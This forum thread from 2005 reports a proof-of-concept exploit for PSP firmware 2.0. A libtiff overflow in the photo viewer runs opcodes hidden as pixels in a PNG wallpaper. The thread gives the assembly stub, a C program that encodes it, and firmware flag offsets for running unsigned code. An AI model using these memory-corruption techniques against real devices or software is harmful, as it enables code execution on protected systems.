2.0 Exploit(s) found!
Sep 23 2005, 03:11 PM
A small team has been working on finding an exploit for 2.0 based on the fact that Sony uses part of the "libtiff" code for its image viewer in 2.0, which has a known bug. Apparently they've managed to exploit this bug:
First Homebrew Code on 2.00
1. Set the wallpaper to frame_buffer.png (without overflow.tif present in the PHOTO directory, or it will crash).
2. Add overflow.tif to the PHOTO directory and open it in the photo viewer. Custom code to paint the screen, or to run a homebrew app. Not to run illegal games.
How It Works
1. The PNG contains a small amount of code in a known, fixed place (the VRAM). If you look closely at the wallpaper, you can see small coloured pixels in the bottom right. The pixels are Allegrex opcodes, with the highest byte all zero for the ALPHA. These are:

       syscall 0x20C7       ; sceKernelDcacheWritebackInvalidateAll
       slt   a0, zero, sp   ; put 1 into a0
       sll   a0, a0, 6      ; put 64 into a0
       addu  a0, a0, sp     ; a0 = sp + 64: the screen painter address above SP
       jr    a0             ; jump to the screen painter
       nop                  ; branch delay slot
2. The TIFF also contains some code and a buffer that triggers the known BitsPerSample overflow in libtiff in the photo viewer. The buffer overwrites the saved ra (return address) on the stack, so the function returns into the VRAM, which holds the PNG colours. The VRAM code uses SP to calculate the address of the buffer, then jumps there. The screen turns yellow because the colour was 0x12345678 in hex.
I have tested this and it does something: namely, crashing my PSP after turning the screen yellow/brown. But obviously there is an exploit there which they've found.
If you have a 2.0 PSP and want to try it for yourself, you can download the file from our downloads section.
2.0 Exploit - Proof of concept
Source - PSP-Hacks
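As an added example (this is not code from the exploit team or from the original post), the C program below assembles the six-instruction VRAM stub quoted above into Allegrex/MIPS machine words and checks the one constraint the post states: every word's highest byte must be zero, so it can sit in the PNG as a pixel whose ALPHA is 0. It assumes the PSP's 32-bit frame-buffer pixel layout with red in the low byte and alpha in the high byte; the encoder helpers and their names are mine. It also shows why the register order in the add matters: the high byte holds the 6-bit opcode plus the top two bits of rs, so sp (register 29) can only sit in rt, which is why the example writes the add as `addu a0, a0, sp` rather than with sp as the first source.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* MIPS register numbers used by the stub (Allegrex is a MIPS32 core). */
#define REG_ZERO 0u
#define REG_A0   4u
#define REG_SP   29u

#define STUB_LEN 6

/* Encode a MIPS SPECIAL (opcode 0) R-type instruction. */
static uint32_t mips_r(unsigned rs, unsigned rt, unsigned rd, unsigned sa, unsigned funct)
{
    return (rs << 21) | (rt << 16) | (rd << 11) | (sa << 6) | funct;
}

/* Encode SYSCALL with a 20-bit code field (funct 0x0C). */
static uint32_t mips_syscall(uint32_t code)
{
    return ((code & 0xFFFFFu) << 6) | 0x0Cu;
}

/* The six-instruction stub from the post, as machine words. */
static size_t build_vram_stub(uint32_t out[STUB_LEN])
{
    out[0] = mips_syscall(0x20C7);                      /* syscall 0x20C7 (sceKernelDcacheWritebackInvalidateAll) */
    out[1] = mips_r(REG_ZERO, REG_SP, REG_A0, 0, 0x2A); /* slt  a0, zero, sp : a0 = 1 */
    out[2] = mips_r(0, REG_A0, REG_A0, 6, 0x00);        /* sll  a0, a0, 6    : a0 = 64 */
    out[3] = mips_r(REG_A0, REG_SP, REG_A0, 0, 0x21);   /* addu a0, a0, sp   : a0 = sp + 64 */
    out[4] = mips_r(REG_A0, 0, 0, 0, 0x08);             /* jr   a0 */
    out[5] = 0;                                         /* nop (branch delay slot) */
    return STUB_LEN;
}

/* The i-th stub word, or 0 for an out-of-range index. */
uint32_t stub_word(size_t i)
{
    uint32_t w[STUB_LEN];
    size_t n = build_vram_stub(w);
    return i < n ? w[i] : 0;
}

/* 1 if the word can be a pixel with ALPHA == 0. Because the high byte is the
 * opcode plus the top two bits of rs, only SPECIAL instructions whose rs
 * register is numbered below 16 pass this check. */
int alpha_is_zero(uint32_t w)
{
    return (w >> 24) == 0;
}

/* 1 if every word of the stub satisfies the alpha constraint. */
int stub_alpha_ok(void)
{
    uint32_t w[STUB_LEN];
    size_t n = build_vram_stub(w), i;
    for (i = 0; i < n; i++)
        if (!alpha_is_zero(w[i]))
            return 0;
    return 1;
}

/* Byte idx (0=R, 1=G, 2=B, 3=A) of the 8888 pixel that stores word w.
 * Assumed layout: the low byte of the word is red, the high byte is alpha. */
uint8_t pixel_byte(uint32_t w, int idx)
{
    return (uint8_t)((w >> (8 * idx)) & 0xFF);
}

/* Reassemble the word from its four pixel bytes (what the viewer's decode
 * into VRAM effectively does). */
uint32_t pixel_to_word(uint8_t r, uint8_t g, uint8_t b, uint8_t a)
{
    return (uint32_t)r | ((uint32_t)g << 8) | ((uint32_t)b << 16) | ((uint32_t)a << 24);
}

int main(void)
{
    uint32_t w[STUB_LEN];
    size_t n = build_vram_stub(w), i;
    for (i = 0; i < n; i++)
        printf("%08X  R=%02X G=%02X B=%02X A=%02X\n", (unsigned)w[i],
               pixel_byte(w[i], 0), pixel_byte(w[i], 1),
               pixel_byte(w[i], 2), pixel_byte(w[i], 3));
    /* The same add with sp as rs would put 0x03 in the alpha byte. */
    printf("addu a0, sp, a0 = %08X (alpha ok: %d)\n",
           (unsigned)mips_r(REG_SP, REG_A0, REG_A0, 0, 0x21),
           alpha_is_zero(mips_r(REG_SP, REG_A0, REG_A0, 0, 0x21)));
    return stub_alpha_ok() ? 0 : 1;
}
```

Running it lists each word next to the R, G, B, A bytes it would occupy in the wallpaper, and shows that swapping the source registers of the add is enough to break the ALPHA-zero property the post relies on.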
It appears Yoshihiro is still at work in the scene, as he's found another possible exploit similar to the one initially required to get homebrew working on 1.5. Karloz25 found this for us:
Hi, I am giving you some information. Every PSP flag can be found in the encrypted ELF. What is a flag? A flag is used to allow or disallow a console to run code on the console.
I've run some tests modifying it, but when I run my WiFi minigame that comes from my original Burnout game on the 1.50 PSP, I get a 0x80020148 error, and not a decrypting error such as 0xFFFFFFC3. It means my file isn't corrupt. I am running several more tests.
It starts at offset 0xC0:
for the WiFi, look for: 0000 0009
for the UMD, look for: 0000 0002
for the MS, look for: 0000 000B
Edit: I found something else. When I remove the famous MD5 at the end, I get the error "The game could not be started 80020001". On 1.52 it gives the same error as a 1.50 PSP when we try to run an EBOOT for 1.00 without KXploit on it. It's the same error code on 1.52 as the one that showed that the 1.50 firmware was hackable. I'll upload the files. Can someone test it on a 2.00 to know if there is the same error? Thank you.
Source - Sony-X-Team
You're kidding, right?
Unless you're talking about something else.
EDIT: I am stupid for not reading it carefully.
It is confirmed by more than one site (some of which I can't post here for rules reasons) that the PNG method works.
However, it does not run homebrew yet. It is a proof of concept that allowed someone to insert a small piece of unsigned code on a protected PSP 2.0.
Not a rumor, people. It may not amount to full-blown homebrew, but it is a helluva lot farther than has been gotten yet. You can download the files from psp-spot.com.
This news was posted some time ago in the front page news as well as a continuing discussion which can be found here: